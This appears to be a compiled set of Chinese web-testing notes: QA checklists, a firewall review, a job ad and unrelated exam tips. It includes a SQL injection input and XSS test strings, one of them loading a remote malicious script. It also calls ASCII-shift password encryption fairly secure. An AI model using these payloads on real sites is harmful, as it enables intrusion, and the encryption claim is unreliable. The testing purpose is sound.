web测试点总结(精选10篇)
1.web测试点总结 篇一
功能测试点总结 功能测试就是对产品的各功能进行验证,根据功能测试用例,逐项测试,检查产品是否达到用户要 求的功能。针对Web系统的常用测试方法如下:
1.页面链接检查:每一个链接是否都有对应的页面,并且页面之间切换正确。可以使用一些工具,如LinkBotPro、File-AIDCS、HTML Link Validater、Xenu等工具。LinkBotPro不支持中文,中文字符显示为乱码;HTML Link Validater只能测试以Html或者htm结尾的网页链接;Xenu无需安装,支持asp、do、jsp等结尾的网页,xenu测试链接包括内部链接和外部链接,在使用的时候应该注意,同时能够生成html格式的测试报告。如果系统用QTP进行自动化测试,也可以使用QTP的页面检查点检查链接。
2.相关性检查:功能相关性:删除/增加一项会不会对其他项产生影响,如果产生影响,这些影响是否都正确,常见的情况是,增加某个数据记录以后,如果该数据记录某个字段内容较长,可能会在查询的时候让数据列表变形。
数据相关性:下来列表默认值检查,下来列表值检查,如果某个列表的数据项依赖于其他模块中的数据,同样需要检查,比如,某个数据如果被禁用了,可能在引用该数据项的列表中不可见。
3.检查按钮的功能是否正确:如新建、编辑、删除、关闭、返回、保存、导入,上一页,下一页,页面跳转,重置等功能是否正确。常见的错误会出现在重置按钮上,表现为功能失效。
4.字符串长度检查: 输入超出需求所说明的字符串长度的内容, 看系统是否检查字符串长度。还要检查需求规定的字符串长度是否是正确的,有时候会出现,需求规定的字符串长度太短而无法输入业务数据。
5.字符类型检查: 在应该输入指定类型的内容的地方输入其他类型的内容(如在应该输入整型的地方输入其他字符类型),看系统是否检查字符类型。
6.标点符号检查: 输入内容包括各种标点符号,特别是空格,各种引号,回车键。看系统处理是否正确。常见的错误是系统对空格的处理,可能添加的时候,将空格当作一个字符,而在查询的时候空格被屏蔽,导致无法查询到添加的内容。
7.特殊字符检查:输入特殊符号,如@、#、$、%、!等,看系统处理是否正确。常见的错误是出现在% ‘ " 这几个特殊字符
8.中文字符处理: 在可以输入中、英文的系统输入中文,看会否出现乱码或出错。
9.检查信息的完整性: 在查看信息和更新信息时,查看所填写的信息是不是全部更新,更新信息和添加信息是否一致。要注意检查的时候每个字段都应该检查,有时候,会出现部分字段更新了而个别字段没有更新的情况。
10.信息重复: 在一些需要命名,且名字应该唯一的信息输入重复的名字或ID,看系统有没有处理,会否报错,重名包括是否区分大小写,以及在输入内容的前后输入空格,系统是否作出正确处理。
11.检查删除功能:在一些可以一次删除多个信息的地方,不选择任何信息,按“delete”,看系统如何处理,会否出错;然后选择一个和多个信息,进行删除, 看是否正确处理。如果有多页,翻页选,看系统是否都正确删除,并且要注意,删除的时候是否有提示,让用户能够更正错误,不误删除。
12.检查添加和修改是否一致: 检查添加和修改信息的要求是否一致,例如添加要求必填的项,修改也应该必填;添加规定为整型的项,修改也必须为整型.13.检查修改重名:修改时把不能重名的项改为已存在的内容,看会否处理,报错.同时,也要注意,会不会报和自己重名的错.14.重复提交表单:一条已经成功提交的纪录,返回后再提交,看看系统是否做了处理。对于Web系统来说,可以通过浏览器返回键或者系统提供的返回功能。
15.检查多次使用返回键的情况: 在有返回键的地方,返回到原来页面,重复多次,看会否出错。
16.搜索检查: 有搜索功能的地方输入系统存在和不存在的内容,看搜索结果是否正确.如果可以输入多个搜索条件,可以同时添加合理和不合理的条件,看系统处理是否正确,搜索的时候同样要注意特殊字符,某些系统会在输入特殊字符的时候,将系统中所有的信息都搜索到。
17.输入信息位置: 注意在光标停留的地方输入信息时,光标和所输入的信息会否跳到别的地方。
18.上传下载文件检查:上传下载文件的功能是否实现,上传文件是否能打开。对上传文件的格式有何规定,系统是否有解释信息,并检查系统是否能够做到。下载文件能否打开或者保存,下载的文件是否有格式要求,如需要特殊工具才可以打开等。上传文件测试同时应该测试,如果将不能上传的文件后缀名修改为可以上传文件的后缀名,看是否能够上传成功,并且,上传文件后,重新修改,看上传的文件是否存在。
19.必填项检查:应该填写的项没有填写时系统是否都做了处理,对必填项是否有提示信息,如在必填项前加“*”;对必填项提示返回后,焦点是否会自动定位到必填项。
20.快捷键检查:是否支持常用快捷键,如Ctrl+C、Ctrl+V、Backspace等,对一些不允许输入信息的字段,如选人,选日期对快捷方式是否也做了限制。
21.回车键检查: 在输入结束后直接按回车键,看系统处理如何,会否报错。这个地方很有可能会出现错误。
22.刷新键检查:在Web系统中,使用浏览器的刷新键,看系统处理如何,会否报错。
23.回退键检查:在Web系统中,使用浏览器的回退键,看系统处理如何,会否报错。对于需要用户验证的系统,在退出登录后,使用回退键,看系统处理如何;多次使用回退键,多次使用前进键,看系统如何处理。
24.直接URL链接检查:在Web系统中,直接输入各功能页面的URL地址,看系统如何处理,对于需要用户验证的系统更为重要。如果系统安全性设计的不好,直接输入各功能页面的URL地址,很有可能会正常打开页面。
25.空格检查:在输入信息项中,输入一个或连串空格,查看系统如何处理。如对于要求输入整型、符点型变量的项中,输入空格,既不是空值,又不是标准输入。
26.输入法半角全角检查:在输入信息项中,输入半角或全角的信息,查看系统如何处理。如对于要求输入符点型数据的项中,输入全角的小数点(“。”或“.”,如4.5);输入全角的空格等。
27.密码检查:一些系统的加密方法采用对字符Ascii码移位的方式,处理密码加密相对较为简单,且安全性较高,对于局域网系统来说,此种方式完全可以起到加密的作用,但同时,会造成一些问题,即大于128的Ascii对应的字符在解密时无法解析,尝试使用“uvwxyz”等一些码值较大的字符作为密码,同时,密码尽可能的长,如17位密码等,造成加密后的密码出现无法解析的字符。
28.用户检查:任何一个系统,都有各类不同的用户,同样具有一个或多个管理员用户,检查各个管理员之间是否可以相互管理,编辑、删除管理员用户。同时,对于一般用户,尝试删除,并重建同名的用户,检查该用户其它信息是否重现。同样,提供注销功能的系统,此用户再次注册时,是否作为一个新的用户。而且还要检查该用户的有效日期,过了有效日期的用户是不能登录系统的。容易出现错误的情况是,可能有用户管理权限的非超级管理员,能够修改超级管理员的权限。
29.系统数据检查:这是功能测试最重要的,如果系统数据计算不正确,那么功能测试肯定是通不过的。数据检查根据不同的系统,方法不同对于业务管理平台,数据随业务过程、状态的变化保持正确,不能因为某个过程出现垃圾数据,也不能因为某个过程而丢失数据。
30.系统可恢复性检查:以各种方式把系统搞瘫,测试系统是否可正常迅速恢复。
31.确认提示检查:系统中的更新、删除操作,是否提示用户确认更新或删除,操作是否可以回退(即是否可以选择取消操作),提示信息是否准确。事前或事后提示,对于Update或Delete操作,要求进行事前提示。
32.数据注入检查:数据注入主要是对数据库的注入,通过输入一些特殊的字符,如“’”,“/”,“-”等或字符组合,完成对SQL语句的破坏,造成系统查询、插入、删除操作的SQL因为这些字符而改变原来的意图。如select * from table where id = ‘ ’ and name = ‘ ’,通过在id输入框中输入“12’-”,会造成查询语句把name条件注释掉,而只查询id=12的记录。同样,对于update和delete的操作,可能会造成误删除数据。当然还有其它一些SQL注入方法,具体可以参考《SQL应用高级SQL注入.doc》,很多程序都是基于页面对输入字符进行控制的,可以尝试跳过界面直接向数据库中插入数据,比如用Jmeter,来完成数据注入检查。
33.刷新检查:web系统中的WebFor m.控件实时刷新功能,在系统应用中有利有弊,给系统的性能带来较大的影响。测试过程中检测刷新功能对系统或应用造成的影响(白屏),检查控件是否回
归默认初始值,检查是否对系统的性能产生较大影响(如每次刷新都连接数据库查询等)。
34.事务检查:对于事务性操作,断开网络或关闭程序来中断操作,事务是否回滚。
35.时间日期检查:时间、日期验证是每个系统都必须的,如2006-2-
29、2006-6-31等错误日期,同时,对于管理、财务类系统,每年的1月与前一年的12月(同理,每年的第1季度与前一年的第4季度)。另外,对于日期、时间格式的验证,如2006年2月28日、2006-2-
28、20060228等。日期检查还要检查日期范围是否符合实际的业务,对于不符合时间业务的日期,系统是否会有提示或者有限制。
36.多浏览器验证:越来越多的各类浏览器的出现,用户访问Web程序不再单单依赖于Microsoft Internet Explorer,而是有了更多的选择:Maxthon、Firefox、Tencent Traveler等,考虑使用多种浏览器访问系统,验证效果。
37.安装测试:对于C/S架构的系统,安装程序的测试是一个重要方面,安装程序自动化程度、安装选项和设置(验证各种方案是否都能正常安装)、安装过程中断测试、安装顺序测试(分布式系统)、修复安装及卸载测试。
38.文档测试:主要是对用户使用手册、产品手册进行测试,校验是否描述正确、完整,是否与当前系统版本对照,是否易理解,是否二义性等。
39.测试数据检查:事实告诉我们,测试数据比代码更有可能是错的,因此,当测试结果显示有错误发生的时候,怀疑代码错误前要先对测试数据检查一遍。
40.请让我的机器来运行:在某些项目中,出现一个病态的问题:系统没有问题呀,它在我的机器上是能够通过的。这就说明了其中存在着和环境相关的BUG。“是否所有的一切都受到了版本控制工具的管理?”、“本机的开发环境和服务器的环境是否一样?”、“这里是否存在一个真正的BUG,只不过是在其他的机器里偶然出现?”。所有的测试必须在所有系统要求的机器上运行通过,否则的话,代码就可能存在问题。
41.Ajax技术的应用:Ajax有很多优点,但也有很多缺点,如果利用优点、避免缺点,是我们对新的Web2.0应用的一个挑战。而Ajax的应用最直接的问题就是用户体验,用户体验的效果直接关系到是否使用Ajax技术。“会做,并不意味着应该做、必须做”,这就是对Ajax技术的很重要的注
解。
42.Ajax技术的应用:Ajax采用异步调用的机制实现页面的部分刷新功能,异步调用存在异常中断的可能,尝试各种方法异常中断异步的数据调用,查看是否出现问题。在这里遇到的一个问题就是对日期控件的操作,已经如果页面数据较多的时候的刷新。
43.脚本错误:随着Ajax、IFrame等异步调用技术的发展,Javascrīpt技术也越来越受到开发人员的重视,但Javascrīpt存在调试困难、各浏览器存在可能不兼容等问题,因此在Web系统中,可能会出现脚本错误。同时,脚本错误造成的后果可大、可小,不能忽视。
2.web测试点总结 篇二
(1)连接速度测试
用户连接到Web应用系统的速度根据上网方式的变化而变化,他们或许是电话拨号,或是宽带上网,当下载一个程序时,用户可以等待较长的时间。但如果仅仅访问一个页面就不会这样,如果Web系统响应时间太长(例如超过5秒钟),用户就会因没有耐心等待而离开。另外,有些页面有超时的限制,如果响应速度太慢,用户可能还没来得及浏览内容,就需要重新登录了。而且,连接速度太慢,还可能引起数据丢失,使用户浏览不到本来的页面。
(2)负载测试
负载测试是为了测量Web系统在某一负载级别上的性能,以保证Web系统在需求范围内能正常工作。负载级别可以是某个时刻同时访问Web系统的用户数量,也可以是在线数据处理的数量。例如,Web应用系统能允许多少个用户同时在线?如果超过了这个数量.会出现什么现象?Web应用系统能否处理大量用户对同一个页面的请求?
(3)压力测试
压力测试是测试系统的限制和故障恢复能力,也就是测试Web应用系统会不会崩溃,在什么情况下会崩溃,
web可用性测试
(1)导航测试
导航实际上是给访问者提供了一个类似地图的东西,让访问者更快捷的找到需要的东西。它描述了用户在一个页面内操作的方式,在不同的用户接口控制之间,例如,按钮、对话框、列表和窗口等;或在不同的连接页面之间。通过考虑下列问题.可以决定一个Web应用系统是否易于导航:导航是否直观?Web系统的主要部分是否可通过主页存取?Web系统是否需要站点地图、搜索引擎或其他的导航帮助?
(2)图形测试
在Web应用系统中,适当的图片和动画既能起到广告宣传的作用,又能起到美化页面
的效果。一个Web应用系统的图形可以包括图片、动画、边框、颜色、字体、背景、按钮
等。图形测试的内容有以下几个方面。
①要确保图形有明确的用途,图片或动画不要胡乱地堆在一起,以免浪费传输时间。Web应用系统的图片尺寸要尽量地小,并且要能清楚地说明某件事情,一般都链接到某个具体的页面。
②验证所有页面字体的风格是否一致。
③背景颜色应该与字体颜色和前景颜色相搭配。
3.浅谈Web应用服务器测试 篇三
作者:中国软件评测中心 2002年11月
随着Internet 的发展壮大,新的开发模式也应运而生,即所谓的B/S(浏览器/服务器)结构、瘦客户机模式。为了方便的开发、部署、运行和管理基于三层、多层结构的应用,需要 以Web的低层技术为基础,规划一个整体的应用框架,提供相应的支撑平台,这一支撑平台实 际上是基于Internet的中间件,即应用服务器。
应用服务器通过把用户接口、商业逻辑和后台服务分割开来,向开发者提供一种创建、部 署和维护企业规模的Web应用的模块化方式,从而对要转向Web的用户提供了高性能多线程的环 境。
考虑到web应用服务器的以上应用背景和产品特点,把为功能度、性能、兼容性、安全可 靠性作为重点测试方向,并且引用SUN Mircrosystems公司的J2EE标准作为参考标准。
一、功能测试
功能测试的主要目的是验证一款产品是否是一个符合J2EE标准的企业级web应用服务器。测试前,应针对J2EE标准中的JSP、SERVLET、JDBC、EJB等主要功能编写测试用例。测试 用例应尽量覆盖典型的应用和操作,以此来证明一款产品符合J2EE标准中提到的功能。特别是 功能度测试项目,应遵循开发厂商提供的用户手册或程序员手册中有关功能部分的描述作为依 据具体制定。
二、性能测试
性能测试的主要目的是考查在大压力和大数据量情况下,应用服务器最大处理能力和系统 响应时间,同时考查不同压力情况下应用服务器处理能力和系统响应时间。
测试过程中,首先通过JDBC接口与数据库进行连接,根据被测系统的应用环境和实际情况 制定与之相适应的案例数据库。然后使用功能测试中用到的JSP、Servlet和EJB测试程序,通 过Web Application Stress Tool1.1录制相应的测试脚本,模拟在多用户并发情况下数据库的 插入、更新、查询,并记录成功点击次数、点击率等相关参数。最后通过远程监控系统对Web 应用服务器的CPU占有率、内存进行实时监控,通过对上述数据的汇总分析,得出功能服务器 的性能。
三、兼容性测试
兼容性部分的测试应分成两部分来考察:即硬件兼容性和软件兼容性。
硬件兼容性主要验证Web应用服务器的硬件配置要求。测试中,可以根据厂商提供的安装 手册承诺的配置信息,来验证功能服务器的硬件兼容性。
软件兼容性考察的方面较多,主要包括:系统兼容性、数据库兼容性、Web服务器兼容 性、开发工具兼容性、与其它中间件产品的兼容性、J2EE组件的兼容性等多个方面。
四、安全可靠性测试
4.web测试工程师的岗位职责范本 篇四
1. 负责公司产品及项目的功能及性能测试工作;
2. 在测试过程中,迅速、准确、全面的找出产品中的问题,并对问题产生原因做基本判断;
3. 测试场景设计、用例设计,录制/修改/维护测试脚本、测试执行、测试结果分析汇总,协助开发人员进行性能瓶颈分析;
4. 根据产品、项目需要,对性能测试方法/工具/技术进行研究,形成技术储备和技术积累;
5. 完成领导交办的其他工作;
任职要求:
1. 大专及以上学历,1年以上web测试经验;
2. 口头、书面表达能力强,能对产品的缺陷做出准确、清晰的描述;
3. 思路清晰,思维缜密,善于学习,能在不断积累测试经验的同时,定期总结;
4. 能独立工作,且具有较强的团队合作、沟通能力;
5. 熟悉Jmeter测试工具以及BUG管理平台(Redmine);
6. 熟悉MySQl、Redis等主流数据库,掌握基本的Sql语句;
7. 使用fiddler等抓包工具进行数据验证以及路由地址映射;
8. 爱岗敬业,拥有高度的责任心并能承担较大的工作压力;
5.web测试点总结 篇五
:主机扫描→端口扫描→漏洞扫描,这是一个极为常见且有效的窥探目标主机的方法,它虽算不上是攻击,但针对某台设备的攻击往往在这些步骤结束后接踵而至。有些国家视未经允许扫描他人主机为非法。
测试工程师:不管是企业网内的重要服务器还是普通员工的个人电脑都不应该被肆意扫描。
测试实况: 我们首先在防火墙不加任何防范情况下在内网扫描一台位于DMZ(非军事化区)的服务器。内网的扫描主机在Fedora Core 3上安装了Nmap和Nessus等扫描软件,被扫描的服务器为默认安装的Windows Server 。Nessus漏洞扫描的成功建立在主机扫描和端口扫描成功的基础上。防范Nmap的扫描行为是给防火墙出的第一道题!
如图1所示,它是防火墙不加防御情况下对DMZ中服务器的扫描结果(任何一个采用默认安装的操作系统都是不安全的)。在获取了这些信息后, 就可以利用这些漏洞或隐患着手下一步的攻击了。
然后,我们让厂商的工程师进行现场配置,在保证其他通信不受影响的前提下提供对扫描行为的限制。扫描时我们使用Nmap中的四种方法对DMZ中的服务器及端口进行扫描。拓扑如图2所示。
我们发现,这些防火墙在应对扫描行为时的态度有所不同。如表一所示。
表一:网络攻击或威胁的防御
主机扫描端口扫描Ping-FloodSYN-Flood
Check Point×√/×√√
Fortinet√√√√
联想网御√*√√√
首信√√√*√*
Symantec×√√√
注:√为支持,×为不支持,其他详见上文和防DoS攻击部分的文字说明
网络攻击或威胁的防御
FortiGate 3600在这方面的控制最为精细。在它的IPS功能模块的“异常”行为中,管理员可以在扫描选项中设置扫描数据包的阈值,然后选择你想要采取的行动,可以选择通过或是丢弃相关数据包,同时还可以打开日志对该行为进行记录。经测试,它确实可以做到精确控制。可贵的是,Nmap作为一种常用的 工具,FortiGate 3600将其添加到了IPS功能模块的“特征”库中,即便不在“异常”中进行扫描控制,选中Nmap阻断就可以解决各式各样的Nmap扫描。
首信CF -EP500也可以做到扫描防御,在其上设置禁止扫描,当扫描行动开始后,CF 2000-EP500会自动创建一条安全规则,将扫描器的网络访问停掉,除了扫描数据外,扫描器的其他通信也被禁止。不过,通信被禁止的时间可以由管理员来指定。这种惩罚性措施得到了一些用户的青睐。当然,有些员工的主机也有可能成为 的“跳板”而被“无辜”地停止到Internet的访问。
联想网御Super V的“禁扫”设置也是很直接,不过Super V的主机扫描阈值不能低于10,否则不能识别,但端口扫描可以完全控制。 可以采用分段扫描(比如每次9个)的方法来扫描活动主机并逃过防火墙的“眼睛”,不过即便如此,由于Super V可以进行端口扫描的精细控制,分段扫描的威胁性也就大大降低了。
Symantec Gateway Security 5460可以提供对端口扫描的控制,可以通过日志查看谁进行了扫描操作,但仍可成功进行主机扫描。
Check Point i-SECURITY SP-5500不会禁止扫描数据的通过,但是可以通过日志记录端口扫描行为。据Check Point的支持工程师讲,针对扫描行为多发的内网,他们有专门的内网安全产品提供对扫描的完全控制。而对于网络边界的防火墙来说,外网用户的扫描行为可以通过设置安全规则来控制。我们认为,特别是针对那些提供了多个内网接口的防火墙来说,防火墙提供此项功能必要而且便于配置。
P2P控制
网络管理员:最近“火”起来的Skype,人们习惯将它归类于IM(即时消息),其实,和BT下载一样,它本质上属于P2P通信软件。这些工具很多都宣称自己可以穿越防火墙。难道防火墙就束手无策吗?
表二:P2P通信控制
Skype控制P2P新增特征
Check Point√√
Fortinet√√
测试工程师:IM、P2P们轻松避过防火墙对于企业网安全是非常不利的,比如MSN“性感鸡”病毒造成的危害。但它们也能帮助企业提高效率、节省成本,防火墙不应一概“杀掉”了事,而应该能够依用户的愿望有选择地进行控制。
测试实况: Skype等软件为了便于用户在各种条件下使用,它们可以利用80(一般用于HTTP)和443(一般用于HTTPS)端口进行通信,而这两个端口对于防火墙来说一般都是打开的。我们采用了两种方法进行测试,旨在考察防火墙是否可以控制Skype通信以及是如何实现此功能的。拓扑如图3所示(第二种拓扑用代理服务器取代网关其余配置类?。
实际测试中,只有Check Point i-SECURITY SP-5500和FortiGate 3600能够专门针对Skype进行控制,而且两种测试拓扑都控制成功,尽管它们在配置上有所区别,
不管是哪种测试拓扑,在一开始,我们并没有启动Skype控制,而是在防火墙上添加了必要的地址和策略配置,除了域名解析外,我们只允许目的端口为80和443的通信通过。并启用了NAT,还根据需要进行了默认路由的配置。保证Skype能够成功联机并通过Sniffer进行了抓包以确认通信是否按照预期的那样进行。
然后,我们打开防火墙的控制选项。在FortiGate 3600的IPS中,专门有一个P2P控制组,组内包含BT(Bit_Torrent)、电驴(Edonkey)、Gnutella、Kazaa和Skype等小项,你可以对其中的任意一个或多个进行阻断。而大家熟悉的MSN则被放到了IPS的IM控制组中。在将Skype阻断打开后,Skype不能联机。
Check Point i-SECURITY SP-5500进行Skype控制的结果和FortiGate 3600是一样的,Skype联机成功与否完全取决于防火墙是否打开控制功能。Check Point i-SECURITY SP-5500应用智能的P2P控制部分有MSN和Kazaa等项目,尽管其中没有对Skype的控制选项,但在P2P和其他很多针对应用层的控制栏目中,Check Point都提供了新增特征的功能。即通过输入某种软件的应用层特征,来实现对该软件的控制。这是一个非常好的特性!因为现在每天都会有新的P2P软件被开发出来,使用这种特性可以使用户不必等到下次产品升级就可以对其进行控制。Check Point的工程师在测试过程中将Skype的特征码发给了我们。令人欣喜的是,FortiGate 3600也支持新增特征。
在测试前,我们听说有一些网关产品通过访问控制规则而不是应用层特征来控制IM,这些规则过滤掉了到Internet上IM用户注册服务器的部分或全部通信。我们认为这种方法不灵活而且容易失效。因而设计了Skype穿过防火墙通过代理服务器进行联机的测试拓扑。
实际应用中,防火墙可以封掉到某些代理服务器的通信。我们这个测试主要想观察一下设备在过滤Skype通信时的做法,因而需要在防火墙上设置允许到代理服务器的数据通过。
经过测试,Check Point i-SECURITY SP-5500和FortiGate 3600都能控制成功,而此时Skype用户的笔记本电脑上MSN依然可以登陆(MSN未加控制)。由于内网Skype用户所有的通信都指向了代理服务器(经Sniffer抓包确实如此),所以它们应该都是通过在应用层分析Skype的特征来实现控制的。
防DoS攻击
测试工程师:我们没有将测试仪中所有的DoS攻击武器都搬出来考验防火墙,而是仅仅选取了Ping_Flood和Syn_Flood两种攻击。这两种攻击都会使目标主机在极短时间内陷入瘫痪,比较而言,Syn_Flood由于半开连接更耗资源等因素,其危害更大。
测试实况:正如我们所料,这些产品都可以对这两种DoS攻击进行防范。
我们在测试仪IXIA 1600T上使用攻击软件IxAttack和IxExplorer来模拟攻击源。由于我们还要考察攻击情况下的Web应用的性能,为避免形成带宽瓶颈,我们所有的攻击测试都在测试仪的百兆端口上进行。测试拓扑如图4所示,当防火墙不启动相应的DoS攻击防御时,测试仪的攻击按钮刚刚按下,位于DMZ的Windows Server 2003立即“死机”。
所有参测产品都可以设置攻击数据包数目的阈值,当启动防御后,再次进行攻击,服务器可以正常工作,CPU利用率维持在10%以下,通过Sniffer抓包,也可以发现不同厂商在应对DoS攻击时的不同做法。有的仍让很少量的包通过,有的则丢弃所有的包。我们此次测试没有对防DoS攻击的漏包数目的精确度进行衡量。
需要说明的一点,首信CF 2000-EP500的防DoS攻击表现有所不同。一开始,我们在其上进行防御配置后,DMZ的服务器仍然会迅速“死机”。它此时并不认为这是一种攻击,而将攻击源发来的数据转发给DMZ的服务器。后来,我们在测试仪上将攻击源的IP地址设为不断变化,它可以防范成功。在使用攻击软件xdos进行尝试也可以成功防御。
在攻击过程中,我们还考察了防火墙是否可以将攻击事件准确地记录到日志中。对于支持Syslog服务器的产品,我们使用3CDeamon作为Syslog服务器软件进行了测试,结果发现日志都非常准确。
VoIP支持
测试工程师:VoIP部署中比较常见的H.323协议既使用1720这样的固定端口,也使用较多的动态端口进行通信。有些防火墙,由于不能对H.323协议进行识别,只能通过规则静态地打开一段端口来保证IP电话的正常运行,这一段打开的端口,在 眼中,就像是一扇打开的大门。此次测试,我们针对H.323协议对防火墙进行了功能性验证。
测试实况:结果发现,所有防火墙都能识别H.323,并根据协议的需要在通信过程中允许使用H.323动态端口的媒体流通过。我们使用微软NetMeeting充当H.323的端点,一台Windows XP笔记本位于防火墙内,一台装有Windows 2000 Pro的台式机位于防火墙的外网,它们都预装了NetMeeting,版本均为3.01,测试拓扑见图5所示。
经测试,每个防火墙都支持这项服务。一开始,防火墙的策略设置为“permit any”,我们将这两个H.323 端点连接到防火墙,并针对对方的IP发起呼叫,结果通话可以顺利进行。
与此同时,我们用Sniffer对通信的全过程进行抓包。可以发现固定使用的TCP端口1720和其他的TCP、UDP动态端口。
然后,我们删除“permit any”这条策略,添加了允许H.323服务。当端点发起呼叫后,对方接受并开始通话,没有感觉到和第一次有何不同。
6.web测试点总结 篇六
编写一个爬虫也不是什么费力气的活,我用的是一个开源的开发包 Jsoup 编写了一个爬虫,实现方法并不复杂,不做详细说明。
需要注意的一点是,爬虫需要一种模糊过滤机制,举个例子,针对 news.php?id=11 ,这一参数的注入测试只要一次就可以了,我们只要检测了 news.php?id=11 就不需要检测 news.php?id=22 ,那么我们应该避免爬虫抓取到大量此类重复的 url ,那么就要进行模糊过滤,我们首先把一个带参数的 url 分割成文件和参数的形式,之后把他储存到一个队列中,之后再抓取到带参 url 也行进分割之后进行匹配,如果发现队列中已经有了这个文件和这个参数的组合就抛弃这条 url 。
7.web项目总结 篇七
这是第二次做项目了,虽然每次做的并不是什么很大的项目,但做项目的过程中却真正体会了其中的艰辛与快乐。一个个问题解决时的快意,一个个问题产生后的迷茫,都让我回味无穷。乱七八糟的讲呢也不知道从哪讲起,所以总结了以下几点心得:
1.对于网站开发,是离不开数据库的,数据库的结构设计也是重中之重。我们团队在做的过程中对表进行了一些修改,导致很多不必要的问题。因为数据库结构设计的更改,有时会导致一定程度的返工,这时修改代码所消耗的时间会让我们得不偿失的,数据库结构设计的好坏在很大程度上决定了软件设计的速度。
2.代码书写的问题。程序代码都具有严格的规范性,所以有时一个不起眼的问题,在造成问题的同时我们也很难发现,我在读取数据库的资料时就犯了这样的问题。还有就是代码的精简度,是衡量一个优秀软件的重要指标,对于这方面我很少做考虑。
3.整体性能与用户需求。事实确实如此,我们会被很多习惯限制自己的思维,在项目中我们根本没有考虑到并发和吸引用户等问题,我想这是当下要慢慢去想的。
4.对学过的知识的掌握。做项目肯定会用到以前的一些知识点,我平常很少花时间去复习学过的知识,就是等到哪里用到了就去找,最后才发现已经忘了这个知识点是出现在那一次课了。所以对学过的知识有一个复习和很好的归纳是有必要的。
5.分工与合作。项目完成以后,我体会到任务分配的好的话,会带来很多好处,任务分配下去,不同的人要做不相干的模块,这样在整合项目的时候也会省事很多。
8.web实训总结 篇八
1)、首先确定网站的目标是关键,明确谁是网站将来的访问者。确保目标和主题明确、数据充分并保持目标的简洁性。其次是确定网站的主题风格和创意点。主题选材要小而精,最好是选择自己擅长或感兴趣的内容。选题不要太滥,目标定位不要太高。最后是网站结构的确定,规划一个网站结构,可以用树状结构先把每个页面的内容大纲列出来,尤其是要制作一个有很多页面的大网站时,特别需要把这个架构规划好,同时要考虑到以后可能的扩充性,免得做好以后又要经常该整个网站的架构,费时又费力。规划好结构后,进行网站目录设置。根据网站的主题和内容来分类规划目录,不同的栏目要对应不同的目录,在各个栏目下也要根据网站的内容的不同将其分化成不同的子目录。
2)、要设计一个网站,制作环境是不可少的例如:配置良好的计算机及相关设备;配置完善的系统环境,出了安装操作系统外,还要注意升级浏览器的版本,如果要进行服务器端程序开发还要有相应得软件系统;备齐网页开发工具软件,包括网页制作工具、服务器端程序开发工具及一些实用的辅助工具;备齐素材制作和加工软件,包括对图形、动画、流媒体和声音进行处理的素材制作和加工软件;备齐常用的网站发布工具等
3)、设计好的网页要有创意要新颖而其还要有自己的特色,要有充实的内容和浏览价值,网页的布局有一定的艺术性。网页的设计与网页内容的配合最为关键,确定网页的主题和定位方向以后,就以目标去搜集相应的材料充实和丰富主题。在设计网页时,千万不要让信息和图片填满网页,网页看起来必须是干净的、有组织有条理的,使用很容易阅读的字体
9.听力测试考查点和答题技巧 篇九
高考英语听力考试的测试点包括:
1.理解对话的主旨大意
如:What’s the man doing?
A.He’s working in a hotel.
B.He’s visiting a young people.
C.He’s travelling around(NMET)
此听力的原文为:
W:So,how long have you been here?
M:Just a couple of days,actually,I am on a big journey.You know,I’m visiting all the places of interest here.
本题是一位男子谈论到此地的各个名胜观光的情况,其中的a big journey、visiting和places of interest here是这位男子谈话的关键,因此,考生若对此进行归纳判断就会马上明白此谈话的主旨大意,选出答案C。
2.获取对话中具体信息
为了说明和解释主旨,对话或独白中需要一些具体信息,如时间、地点、人物、年代、价钱等,这些信息对理解对话,把握对话主旨是不可缺少的内容,且在试题中占相当大的比例。
3.推断对话发生的背景、地点及对话者之间的关系。
4.理解领会对话的观点、态度及意图
通过文中的重要细节、具体事实,揣摩、推断说话者的意图、观点和态度等。
掌握必要的技巧及对策,则可获得事半功倍的效果:
1.利用听录音前的.时间,迅速地捕捉每个小题题干选项所提供的信息,预测短文或对话可能涉及到的内容,这样听录音材料时就有的放矢,有所侧重,提高答题的准确率。
2.对有把握的试题应快速作答,对无把握的试题也要在所听信息的基础上排除错误选项,进行优化处理。不会作答的,立即暂时搁置,准备听新的题目。
3.听录音时重在听懂每句话的意思和内涵,注意捕捉文中所涉及的人物(who)、事件(what)、时间(when)、地点(where)、原因(why)、方式(how)、程度(how long,how soon,how much)、数字(how many/how much)、选择(which…)等,以便检查答案。
4.注意听短文的首句和首段,文章的开首和开首段,往往是对短文内容的概括,如讲话目的、主要内容、作者、论点、故事发生的时间、地点及事由等。
10.web测试点总结 篇十
这是最常见也是最知名的XSS攻击,当Web客户端提交数据后,服务器端立刻为这个客户生成结果页面,如果结果页面中包含未验证的客户端输入数据,那么就会允许客户端的脚本直接注入到动态页面中,传统的例子是站点搜索引擎,如果我们搜索一个包含特殊HTML字符的字符串时,通常在返回页面上仍然会有这个字符串来告知我们搜索的是什么,如果这些返回的字符串未被编码,那么,就会存在XSS漏洞了。
初看上去,由于用户只能在自己的页面上注入代码,所以似乎这个漏洞并不严重,但是,只需一点点社会工程的方法,攻击者就能诱使用户访问一个在结果页面中注入了代码的URL,这就给了攻击者整个页面的权限。由于这种攻击往往会需要一些社会工程方法,所以研发人员往往不会太过看重,但是我们看如下的例子,在服务器上有如下代码:
article.php?title=
这就使得浏览器每3秒就刷新一次页面,而且是一个死循环的状态,这就形成了DOS攻击,导致Web服务器挂掉。
DOM-Based XSS(基于DOM的XSS)
这个漏洞往往存在于客户端脚本,如果一个Javascript脚本访问需要参数的URL,且需要将该信息用于写入自己的页面,且信息未被编码,那么就有可能存在这个漏洞,
黑盒测试和示例:
比较简单的测试是否存在XSS漏洞的方法是验证Web应用是否会对一个包含了HTTP响应的简单脚本的访问请求,例如,Sambar服务器(5.3)包含一个众所周知的XSS漏洞,我们向服务器发送如下的请求,从服务器端能够产生一个响应从而在Web浏览器中执行
server/cgi-bin/testcgi.exe?
这个脚本会在客户浏览器端被执行。
我们再举个例子:
由于Javascript是区分大小写的,有些人会尝试将所有字符转换为大写字符来避免XSS漏洞,在这时,我们最好还是使用VBScript,因为它是大小写不区分的:
JavaScript.
VBScript.
如果我们已经过滤了”<”,或者是
%3cscript. src=www.example.com/malicious-code.js%3e%3c/script%3e
【web测试点总结】推荐阅读:
web前端个人年终总结11-14
Flash安全的一些总结WEB安全09-26
“企业一套表”试点总结08-02
三维化管理机制试点运行情况总结08-13
咸阳市城市社区试点工作总结10-16
人工商品林采伐试点工作总结11-05
防控风险点总结09-21
测试思路总结07-01
电气点检员工作总结10-01
上线测试总结报告07-07